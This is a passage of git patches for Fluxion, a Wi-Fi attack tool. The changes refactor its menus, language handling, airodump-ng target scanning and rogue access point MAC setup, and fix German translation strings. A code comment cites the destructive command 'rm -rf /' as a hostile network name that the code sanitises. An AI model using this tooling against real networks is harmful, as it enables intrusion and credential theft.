-3; fi + if ! fluxion_done $__fluxion_do_sequence__namespace; then + return -3; + fi local __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} @@ -544,26 +555,26 @@ function fluxion_header() { # ======================= < Language > ======================= # function fluxion_unset_language() { FLUXIONLanguage="" + + if [ "$FLUXIONPreferencesFile" ]; then + sed -i.backup "/FLUXIONLanguage=.\+/ d" "$FLUXIONPreferencesFile" + fi } function fluxion_set_language() { if [ ! "$FLUXIONLanguage" ]; then - if [ "$FLUXIONAuto" ]; then - FLUXIONLanguage="en" - else - # Get all languages available. - local languageCodes - readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') + # Get all languages available. + local languageCodes + readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') - local languages - readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') + local languages + readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') - io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] + io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] - FLUXIONLanguage=${IOQueryFormatFields[0]} + FLUXIONLanguage=${IOQueryFormatFields[0]} - echo # Do not remove. - fi + echo # Do not remove. fi # Check if all language files are present for the selected language. @@ -581,6 +592,16 @@ function fluxion_set_language() { fi source "$FLUXIONPath/language/$FLUXIONLanguage.sh" + + if [ "$FLUXIONPreferencesFile" ]; then + if more $FLUXIONPreferencesFile | \ + grep -q "FLUXIONLanguage=.\+" &> /dev/null; then + sed -r "s/FLUXIONLanguage=.+/FLUXIONLanguage=$FLUXIONLanguage/g" \ + -i.backup "$FLUXIONPreferencesFile" + else + echo "FLUXIONLanguage=$FLUXIONLanguage" >> "$FLUXIONPreferencesFile" + fi + fi } # ====================== < Interfaces > ====================== # @@ -1260,16 +1281,16 @@ function fluxion_set_attack() { fi done - attacks+=("$FLUXIONGeneralExitOption") - identifiers+=("$FLUXIONGeneralExitOption") + attacks+=("$FLUXIONGeneralBackOption") + identifiers+=("$FLUXIONGeneralBackOption") descriptions+=("") io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] echo - if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralExitOption" ]; then - fluxion_shutdown; exit + if [ "${IOQueryFormatFields[1]}" = "$FLUXIONGeneralBackOption" ]; then + return -1 fi FluxionAttack=${IOQueryFormatFields[0]} @@ -1335,6 +1356,7 @@ function subtest1() { local interface interface_list_all for interface in "${InterfaceListAll[@]}"; do + if [ "$interface" = "lo" ]; then continue; fi echo "$interface" done } @@ -1393,10 +1415,14 @@ function fluxion_main() { fluxion_startup fluxion_set_resolution - fluxion_set_language - - local -r sequence=("set_attack" "prep_attack" "run_attack") + local -r sequence=( \ + "set_language" \ + "set_attack" \ + "prep_attack" \ + "run_attack" \ + ) + while true # Fluxion's runtime-loop. do fluxion_do_sequence fluxion sequence[@] done From f16917d04f61baee8945c407fdb44de548e64262 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Tue, 9 Jan 2018 13:36:29 -0600 Subject: [PATCH 07/45] Shortened some statements to follow style guides. --- fluxion | 181 +++++++++++++++++++++++++++++++++++++++----------------- 1 file changed, 128 insertions(+), 53 deletions(-) diff --git a/fluxion b/fluxion index fa735df..22862a1 100755 --- a/fluxion +++ b/fluxion @@ -77,8 +77,12 @@ source lib/HashUtils.sh # ============================================================ # # =================== < Parse Parameters > =================== # # ============================================================ # -if ! FLUXIONCLIArguments=$(getopt --options="vdkrnmtl:a:" --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,language:,attack:" --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@") - then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 +if ! FLUXIONCLIArguments=$( + getopt --options="vdkrnmtl:a:" \ + --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,language:,attack:" \ + --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" + ); then + echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi declare -r FLUXIONCLIArguments=$FLUXIONCLIArguments @@ -190,20 +194,26 @@ source "$FLUXIONPath/language/en.sh" function fluxion_startup() { if [ "$FLUXIONDebug" ]; then return 1; fi - FLUXIONBanner=() + local banner=() - format_center_literals " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" - FLUXIONBanner+=("$FormatCenterLiterals") - format_center_literals "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" - FLUXIONBanner+=("$FormatCenterLiterals") + format_center_literals \ + " ⌠▓▒▓▒ ⌠▓╗ ⌠█┐ ┌█ ┌▓\ /▓┐ ⌠▓╖ ⌠◙▒▓▒◙ ⌠█\ ☒┐" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ║▒_ │▒║ │▒║ ║▒ \▒\/▒/ │☢╫ │▒┌╤┐▒ ║▓▒\ ▓║" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ≡◙◙ ║◙║ ║◙║ ║◙ ◙◙ ║¤▒ ║▓║☯║▓ ♜◙\✪\◙♜" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ║▒ │▒║__ │▒└_┘▒ /▒/\▒\ │☢╫ │▒└╧┘▒ ║█ \▒█║" + banner+=("$FormatCenterLiterals") + format_center_literals \ + " ⌡▓ ⌡◘▒▓▒ ⌡◘▒▓▒◘ └▓/ \▓┘ ⌡▓╝ ⌡◙▒▓▒◙ ⌡▓ \▓┘" + banner+=("$FormatCenterLiterals") + format_center_literals \ + "¯¯¯ ¯¯¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯ ¯¯¯ ¯¯¯¯ ¯¯¯¯¯¯¯ ¯¯¯¯¯¯¯¯" + banner+=("$FormatCenterLiterals") clear @@ -212,32 +222,49 @@ function fluxion_startup() { else echo -e "$CRed" fi - for line in "${FLUXIONBanner[@]}" + for line in "${banner[@]}" do echo "$line"; sleep 0.05 done echo # Do not remove. sleep 0.1 - format_center_literals "${CGrn}Site: ${CRed}https://github.com/FluxionNetwork/fluxion$CClr" + local -r fluxionRepository="https://github.com/FluxionNetwork/fluxion" + format_center_literals "${CGrn}Site: ${CRed}$fluxionRepository$CClr" echo -e "$FormatCenterLiterals" sleep 0.1 - format_center_literals "${CSRed}FLUXION $FLUXIONVersion$CClr (rev. $CSBlu$FLUXIONRevision$CClr)$CYel by$CWht ghost" + local -r versionInfo="${CSRed}FLUXION $FLUXIONVersion$CClr" + local -r revisionInfo="(rev. $CSBlu$FLUXIONRevision$CClr)" + local -r credits="${CYel}by$CWht FluxionNetwork" + format_center_literals "$versionInfo $revisionInfo $credits" echo -e "$FormatCenterLiterals" sleep 0.1 - if installer_utils_check_update "https://raw.githubusercontent.com/FluxionNetwork/fluxion/master/fluxion.sh" "FLUXIONVersion=" "FLUXIONRevision=" $FLUXIONVersion $FLUXIONRevision - then installer_utils_run_update "https://github.com/FluxionNetwork/fluxion/archive/master.zip" "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" "$(dirname "$FLUXIONPath")" + local -r fluxionDomain="raw.githubusercontent.com" + local -r fluxionPath="FluxionNetwork/fluxion/master/fluxion.sh" + local -r updateDomain="github.com" + local -r updatePath="FluxionNetwork/fluxion/archive/master.zip" + if installer_utils_check_update "https://$fluxionDomain/$fluxionPath" \ + "FLUXIONVersion=" "FLUXIONRevision=" \ + $FLUXIONVersion $FLUXIONRevision; then + installer_utils_run_update "https://$updateDomain/$updatePath" \ + "FLUXION-V$FLUXIONVersion.$FLUXIONRevision" \ + "$(dirname "$FLUXIONPath")" fi echo # Do not remove. - FLUXIONCLIToolsRequired=("aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" "fuser:psmisc" "killall:psmisc") - FLUXIONCLIToolsMissing=() + local requiredCLITools=( + "aircrack-ng" "python2:python2.7|python2" "bc" "awk:awk|gawk|mawk" + "curl" "dhcpd:isc-dhcp-server|dhcp" "7zr:p7zip" "hostapd" "lighttpd" + "iwconfig:wireless-tools" "macchanger" "mdk3" "nmap" "openssl" + "php-cgi" "pyrit" "xterm" "rfkill" "unzip" "route:net-tools" + "fuser:psmisc" "killall:psmisc" + ) - while ! installer_utils_check_dependencies FLUXIONCLIToolsRequired[@] - do installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] + while ! installer_utils_check_dependencies requiredCLITools[@]; do + installer_utils_run_dependencies InstallerUtilsCheckDependencies[@] done echo -e "\n\n" # This echo is for spacing @@ -253,20 +280,22 @@ function fluxion_shutdown() { echo -e "$CWht[$CRed-$CWht]$CRed $FLUXIONCleanupAndClosingNotice$CClr" - # List currently running processes which we might have to kill before exiting. + # Get running processes we might have to kill before exiting. local processes readarray processes < <(ps -A) # Currently, fluxion is only responsible for killing airodump-ng, since # fluxion explicitly uses it to scan for candidate target access points. # NOTICE: Processes started by subscripts, such as an attack script, - # MUST BE TERMINATED BY THAT SAME SCRIPT in the subscript's abort handler. + # MUST BE TERMINATED BY THAT SCRIPT in the subscript's abort handler. local -r targets=("airodump-ng") local targetID # Program identifier/title for targetID in "${targets[@]}"; do # Get PIDs of all programs matching targetPID - local targetPID=$(echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}') + local targetPID=$( + echo "${processes[@]}" | awk '$4~/'"$targetID"'/{print $1}' + ) if [ ! "$targetPID" ]; then continue; fi echo -e "$CWht[$CRed-$CWht] `io_dynamic_output $FLUXIONKillingProcessNotice`" kill -s SIGKILL $targetPID &> $FLUXIONOutputDevice @@ -274,7 +303,9 @@ function fluxion_shutdown() { # Assure changes are reverted if installer was activated. if [ "$PackageManagerCLT" ]; then - echo -e "$CWht[$CRed-$CWht] "$(io_dynamic_output "$FLUXIONRestoringPackageManagerNotice")"$CClr" + echo -e "$CWht[$CRed-$CWht] "$( + io_dynamic_output "$FLUXIONRestoringPackageManagerNotice" + )"$CClr" unprep_package_manager fi @@ -459,7 +490,7 @@ function fluxion_undo() { local __fluxion_undo__instruction=${__fluxion_undo__history[__fluxion_undo__i-1]} local __fluxion_undo__command=${__fluxion_undo__instruction%%_*} local __fluxion_undo__identifier=${__fluxion_undo__instruction#*_} - + if ! eval ${__fluxion_undo__namespace}_${FLUXIONUndoable["$__fluxion_undo__command"]}_$__fluxion_undo__identifier; then eval FXDLog_$__fluxion_undo__namespace=\("${__fluxion_undo__history[@]::$__fluxion_undo__i}"\) return 0 @@ -568,9 +599,15 @@ function fluxion_set_language() { readarray -t languageCodes < <(ls -1 language | sed -E 's/\.sh//') local languages - readarray -t languages < <(head -n 3 language/*.sh | grep -E "^# native: " | sed -E 's/# \w+: //') + readarray -t languages < <( + head -n 3 language/*.sh | + grep -E "^# native: " | + sed -E 's/# \w+: //' + ) - io_query_format_fields "$FLUXIONVLine Select your language" "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" languageCodes[@] languages[@] + io_query_format_fields "$FLUXIONVLine Select your language" \ + "\t$CRed[$CSYel%d$CClr$CRed]$CClr %s / %s\n" \ + languageCodes[@] languages[@] FLUXIONLanguage=${IOQueryFormatFields[0]} @@ -687,7 +724,9 @@ function fluxion_allocate_interface() { # Reserve interfaces rmmod -f $driver &> $FLUXIONOutputDevice # Wait while interface becomes unavailable. - echo -e "$FLUXIONVLine `io_dynamic_output $FLUXIONUnloadingWIDriverNotice`" + echo -e "$FLUXIONVLine "$( + io_dynamic_output $FLUXIONUnloadingWIDriverNotice + ) while interface_physical "$identifier" do sleep 1 done @@ -713,7 +752,9 @@ function fluxion_allocate_interface() { # Reserve interfaces modprobe "$driver" &> $FLUXIONOutputDevice # Wait while interface becomes available. - echo -e "$FLUXIONVLine `io_dynamic_output $FLUXIONLoadingWIDriverNotice`" + echo -e "$FLUXIONVLine "$( + io_dynamic_output $FLUXIONLoadingWIDriverNotice + ) while ! interface_physical "$identifier" do sleep 1 done @@ -844,7 +885,9 @@ function fluxion_get_interface() { "$CClr" \ ) - format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + format_apply_autosize \ + "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" + io_query_format_fields \ "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ interfacesAvailableColor[@] interfacesAvailable[@] \ @@ -888,7 +931,9 @@ function fluxion_target_get_candidates() { #fi # Begin scanner and output all results to "dump-01.csv." - if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2> $FLUXIONOutputDevice; then + if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG \ + -bg "#000000" -fg "#FFFFFF" -e \ + "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2> $FLUXIONOutputDevice; then echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" sleep 5 return 2 @@ -906,10 +951,23 @@ function fluxion_target_get_candidates() { echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" # WARNING: The code below may break with different version of airmon-ng. # The times matching operator "{n}" isn't supported by mawk (alias awk). - # readarray FLUXIONTargetCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - # readarray FLUXIONTargetCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) - readarray FluxionTargetCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") - readarray FluxionTargetCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + # readarray FLUXIONTargetCandidates < <( + # gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' + # $FLUXIONWorkspacePath/dump-01.csv + # ) + # readarray FLUXIONTargetCandidatesClients < <( + # gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' + # $FLUXIONWorkspacePath/dump-01.csv + # ) + local -r matchMAC="([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]" + readarray FluxionTargetCandidates < <( + awk -F, "NF==15 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" + "$FLUXIONWorkspacePath/dump-01.csv" + ) + readarray FluxionTargetCandidatesClients < <( + awk -F, "NF==7 && length(\$1)==17 && \$1~/$matchMAC/ {print \$0}" + "$FLUXIONWorkspacePath/dump-01.csv" + ) # Cleanup the workspace to prevent potential bugs/conflicts. sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" @@ -1005,7 +1063,7 @@ function fluxion_get_target() { ) # Parse any non-ascii characters by letting bash handle them. - # Just escape all single quotes in ESSID and let bash's $'...' handle it. + # Escape all single quotes in ESSID and let bash's $'...' handle it. local sanitizedESSID=$( echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14 ) @@ -1020,9 +1078,12 @@ function fluxion_get_target() { elif [ $power -gt $FLUXIONNoiseCeiling ]; then candidatesQuality[i]=100 else - # Bash doesn't support floating point division, so I gotta work around it... - # The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling. - candidatesQuality[i]=$(((${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10))) + # Bash doesn't support floating point division, work around it... + # Q = ((P - F) / (C - F)); Q-quality, P-power, F-floor, C-Ceiling. + candidatesQuality[i]=$( + ((${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / \ + (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10)) + ) fi done @@ -1030,10 +1091,14 @@ function fluxion_get_target() { local -r headerTitle="$FormatCenterLiterals\n\n" format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" - local -r headerFields=$(printf "$FormatApplyAutosize" "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID") + local -r headerFields=$( + printf "$FormatApplyAutosize" \ + "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID" + ) format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" - io_query_format_fields "$headerTitle$headerFields" "$FormatApplyAutosize" \ + io_query_format_fields "$headerTitle$headerFields" \ + "$FormatApplyAutosize" \ candidatesColor[@] \ candidatesESSID[@] \ candidatesQuality[@] \ @@ -1063,21 +1128,23 @@ function fluxion_get_target() { # network "; rm -rf / ;". If the string isn't sanitized accidentally # shit'll hit the fan and we'll have an extremly distressed user. # Replacing ' ', '/', '.', '~', '\' with '_' - FLUXIONGetTargetSSIDClean=$( + FluxionTargetSSIDClean=$( echo "$FLUXIONGetTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' ) # We'll change a single hex digit from the target AP's MAC address. # This new MAC address will be used as the rogue AP's MAC address. - local -r rogueMACHex=$(printf %02X $((0x${APTargetMAC:13:1} + 1))) - FLUXIONGetTargetRogueMAC="${FLUXIONGetTargetMAC::13}${rogueMACHex:1:1}${FLUXIONGetTargetRogueMAC:14:4}" + local -r rogueMACHex=$(printf %02X $((0x${FluxionTargetMAC:13:1} + 1))) + FluxionTargetRogueMAC="${FluxionTargetMAC::13}${rogueMACHex:1:1}${FluxionTargetMAC:14:4}" } function fluxion_target_show() { format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" local colorlessFormat="$FormatApplyAutosize" - local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') + local colorfullFormat=$( + echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g' + ) printf "$colorlessFormat" "" "ESSID" "\"${FluxionTargetSSID:-[N/A]}\" / ${FluxionTargetEncryption:-[N/A]}" "" printf "$colorlessFormat" "" "Channel" " ${FluxionTargetChannel:-[N/A]}" "" @@ -1269,13 +1336,19 @@ function fluxion_set_attack() { readarray -t attacks < <(ls -1 attacks) local descriptions - readarray -t descriptions < <(head -n 3 attacks/*/language/$FLUXIONLanguage.sh | grep -E "^# description: " | sed -E 's/# \w+: //') + readarray -t descriptions < <( + head -n 3 attacks/*/language/$FLUXIONLanguage.sh | \ + grep -E "^# description: " | sed -E 's/# \w+: //' + ) local identifiers=() local attack for attack in "${attacks[@]}"; do - local identifier="$(head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | grep -E "^# identifier: " | sed -E 's/# \w+: //')" + local identifier=$( + head -n 3 "attacks/$attack/language/$FLUXIONLanguage.sh" | \ + grep -E "^# identifier: " | sed -E 's/# \w+: //' + ) if [ "$identifier" ]; then identifiers+=("$identifier") else identifiers+=("$attack") fi @@ -1285,7 +1358,9 @@ function fluxion_set_attack() { identifiers+=("$FLUXIONGeneralBackOption") descriptions+=("") - io_query_format_fields "" "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" attacks[@] identifiers[@] descriptions[@] + io_query_format_fields "" \ + "\t$CRed[$CSYel%d$CClr$CRed]$CClr%0.0s $CCyn%b$CClr %b\n" \ + attacks[@] identifiers[@] descriptions[@] echo @@ -1422,7 +1497,7 @@ function fluxion_main() { "prep_attack" \ "run_attack" \ ) - + while true # Fluxion's runtime-loop. do fluxion_do_sequence fluxion sequence[@] done From 6661266e152ec144eb5e4c5b13bc24783a7451b3 Mon Sep 17 00:00:00 2001 From: deltax Date: Tue, 9 Jan 2018 21:08:26 +0100 Subject: [PATCH 08/45] Transform spaces to tabs - Better usage for different editors - Easier to handle --- .editorconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.editorconfig b/.editorconfig index 28ee5a7..c68852e 100644 --- a/.editorconfig +++ b/.editorconfig @@ -6,7 +6,7 @@ insert_final_newline = true max_line_length=120 [*.sh] -indent_style = space +indent_style = tab indent_size = 2 charset = utf-8 trim_trailing_whitespace = true From efaea0af1d4207ee81c35fbc073c23bad5216b9b Mon Sep 17 00:00:00 2001 From: deltax Date: Tue, 9 Jan 2018 21:16:47 +0100 Subject: [PATCH 09/45] Fix bad grammer - Fix Minor mistakes --- language/de.sh | 48 ++++++++++++++++++++++++------------------------ 1 file changed, 24 insertions(+), 24 deletions(-) diff --git a/language/de.sh b/language/de.sh index 41030a5..660b930 100755 --- a/language/de.sh +++ b/language/de.sh @@ -2,26 +2,26 @@ # German # native: Deutsch -FLUXIONInterfaceQuery="Wähle deine Netzwerkkarte aus" -FLUXIONUnblockingWINotice="Entferne den Softblock von allen Netzwerkkarten..." -FLUXIONFindingExtraWINotice="Schaue nach fremden drahlosen Netzwerkkarten..." -FLUXIONRemovingExtraWINotice="Entferne freme drahtlose Netzwerkkarten..." -FLUXIONFindingWINotice="Schaue nach fremden drahlosen Netzwerkkarten..." -FLUXIONSelectedBusyWIError="Die ausgewählte Netzwerkkarte befindet sich gerade in benutzung" -FLUXIONSelectedBusyWITip="Führe \"export FLUXIONWIKillProcesses=1\" aus bevor du FLUXION nutzt." -FLUXIONGatheringWIInfoNotice="Sammeln der Daten von allen Netzwerken..." +FLUXIONInterfaceQuery="Wähle Sie ihre Netzwerkkarte aus" +FLUXIONUnblockingWINotice="Wiederherstellen von allen Netzwerkkarten..." +FLUXIONFindingExtraWINotice="Suche nach Netzwerkkarten..." +FLUXIONRemovingExtraWINotice="Entferne Netzwerkkarten..." +FLUXIONFindingWINotice="Suche nach Netzwerkkarten..." +FLUXIONSelectedBusyWIError="Die ausgewählte Netzwerkkarte befindet sich gerade in Benutzung" +FLUXIONSelectedBusyWITip="Führe \"export FLUXIONWIKillProcesses=1\" aus bevor Sie FLUXION benutzen" +FLUXIONGatheringWIInfoNotice="Sammeln von Daten, von allen Netzwerken..." FLUXIONUnknownWIDriverError="Netzwerkkartentreiber konnte nicht bestimmt werden" FLUXIONUnloadingWIDriverNotice="Warte auf Netzwerkarte \"\$wiSelected\"..." -FLUXIONLoadingWIDriverNotice="Warte auf Netzwerkarte \"\$wiSelected\"..." +FLUXIONLoadingWIDriverNotice="Warte auf Treiberantwort \"\$wiSelected\"..." FLUXIONFindingConflictingProcessesNotice="Suche nach Diensten die Probleme verursachen können..." FLUXIONKillingConflictingProcessesNotice="Beende Diensten die Probleme verursachen können..." FLUXIONPhysicalWIDeviceUnknownError="${CRed}Die Physische Schnittstelle konnte nicht ermittelt werden" -FLUXIONStartingWIMonitorNotice="Starte die Netzwerkkarte im Monitor Mode" +FLUXIONStartingWIMonitorNotice="Starte die Netzwerkkarte im sogenannten Monitor Mode" FLUXIONMonitorModeWIEnabledNotice="${CGrn}Monitormode konnte erfolgreich gestartet werden" FLUXIONMonitorModeWIFailedError="${CRed}Monitormode konnte nicht gestartet werden" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starte Netzwerkscanner" -FLUXIONStartingScannerTip="Wenn nach etwa 5 Sekunden Netzwerke sichbar werden, schließe Netzwerkscanner" +FLUXIONStartingScannerTip="Wenn nach etwa 30 Sekunden Netzwerke sichbar werden, schließe Netzwerkscanner" FLUXIONPreparingScannerResultsNotice="Analysieren von allen gesammelten Daten..." FLUXIONScannerFailedNotice="Netzwerkkarte ist möglichweise nicht geeignet ( Keine Netzwerke gefunden )" FLUXIONScannerDetectedNothingNotice="Keine Netzwerke konnten gefunden werden" @@ -30,14 +30,14 @@ FLUXIONHashFileDoesNotExistError="Hash Datei existiert nicht" FLUXIONHashInvalidError="${CRed}Fehler$CClr, falscher Hash" FLUXIONHashValidNotice="${CGrn}Erfolgreich$CClr,Hash wurde erfolgreich verifiziert" FLUXIONPathToHandshakeFileQuery="Geben sie den Pfad zum Handshake an $CClr(Beispiel: /.../dump-01.cap)" -FLUXIONAbsolutePathInfo="Geben sie den Absoluten Pfad ein" +FLUXIONAbsolutePathInfo="Geben sie den absoluten Pfad ein" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONScannerChannelQuery="Wähle deinen Netzwerkkanal aus" -FLUXIONScannerChannelOptionAll="Alle Netzwerkkanäle" -FLUXIONScannerChannelOptionSpecific="Spezifische Kanal(e)" +FLUXIONScannerChannelQuery="Wähle deinen Netzwerkfrequenz aus" +FLUXIONScannerChannelOptionAll="Alle Netzwerkfrequenzen" +FLUXIONScannerChannelOptionSpecific="Spezifische Frequenz(en)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> -FLUXIONScannerChannelSingleTip="Einzelner Kanal" -FLUXIONScannerChannelMiltipleTip="Mehrere Kanäle" +FLUXIONScannerChannelSingleTip="Einzelne Frequenz" +FLUXIONScannerChannelMiltipleTip="Mehrere Frequenzen" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerHeader="FLUXION Scanner" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> @@ -48,15 +48,15 @@ FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Langsame Verbindung FLUXIONHashSourceQuery="Wähle eine Methode aus um den Handshake zu erlangen" FLUXIONHashSourcePathOption="Handshake Pfad eingeben" FLUXIONHashSourceRescanOption="Handshake Ordner neu einlesen" -FLUXIONFoundHashNotice="Ein hash wurde für das Netzwerk gefunden" -FLUXIONUseFoundHashQuery="Möchten sie dieses Netzwerk nutzen" -FLUXIONHashVerificationMethodQuery="Wählen sie eine Methode um den Hash zu Verifizieren" -FLUXIONHashVerificationMethodPyritOption="Pyrit Verifizierung (${CGrn}Empfohlen$CClr)" -FLUXIONHashVerificationMethodAircrackOption="Aircrack Verfizierung (${CYel}Unglaubwürdig$CClr)" +FLUXIONFoundHashNotice="Ein Hash wurde für das Netzwerk gefunden" +FLUXIONUseFoundHashQuery="Möchten Sie dieses Netzwerk nutzen?" +FLUXIONHashVerificationMethodQuery="Wählen sie eine Methode um den Hash zu verifizieren" +FLUXIONHashVerificationMethodPyritOption="Pyrit verifizierung (${CGrn}Empfohlen$CClr)" +FLUXIONHashVerificationMethodAircrackOption="Aircrack verfizierung (${CYel}Nicht empfohlen$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Wählen Sie einen drahtlosen Angriff für den Zugangspunkt aus" FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr Angriff gestartet" -FLUXIONSelectAnotherAttackOption="Wähle einen anderen Angriff" +FLUXIONSelectAnotherAttackOption="Wählen Sie einen anderen Angriff" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONGeneralBackOption="${CRed}Zurück" FLUXIONGeneralExitOption="${CRed}Ausgang" @@ -65,7 +65,7 @@ FLUXIONGeneralNotFoundError="Nicht gefunden" FLUXIONGeneralXTermFailureError="${CRed}Xterm Terminal konnte nicht gestartet werden" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 